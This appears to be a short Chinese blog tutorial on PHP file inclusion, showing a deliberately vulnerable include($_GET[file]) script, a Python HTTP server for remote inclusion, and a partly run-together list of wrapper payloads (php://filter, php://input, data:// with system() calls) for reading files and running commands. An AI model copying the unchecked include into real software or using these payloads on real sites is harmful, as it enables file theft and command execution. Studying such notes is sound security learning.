文件包含漏洞

一、原理

新建1.php

1
2
3
4
5
6
7
8
9
10
11
<?php
$file=$_GET[file];
if (isset($file))
{
include($file);
}
else
{
echo "sorry not";
}
?>

远程文件包含:

应用伪协议 http://

 

1
2
3
python -m http.server       端口               //python3    *启用HTTP服务
 
python  -m SimpleHTTPServer    端口   //python2

伪协议:

1
2
3
http://                    
phar://                      //只可以解压.zip压缩包
php://filter/convert.base64-encode/resource=文件路径         //读文件zip://data://txt/plain,<?php system();?>   data://txt/plain;base64,<?php system();?>  data:,<?php system();?>  ?file=data://text/plain,payload ?>   //执行文件的包含方法包含了你的输入流,通过包含你输入的payload来实现目的。file://路径                //访问本地文件系统php://          //访问各个输入/输出流(I/O streams)php://input           //访问请求的原始数据的只读流  ,请求体插入一句话  <?php system();?>php://output           //访问请求的原始数据的只写流  ,请求体插入一句话  <?php system();?>

 

  

 

posted @   婷clowns  阅读(21)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示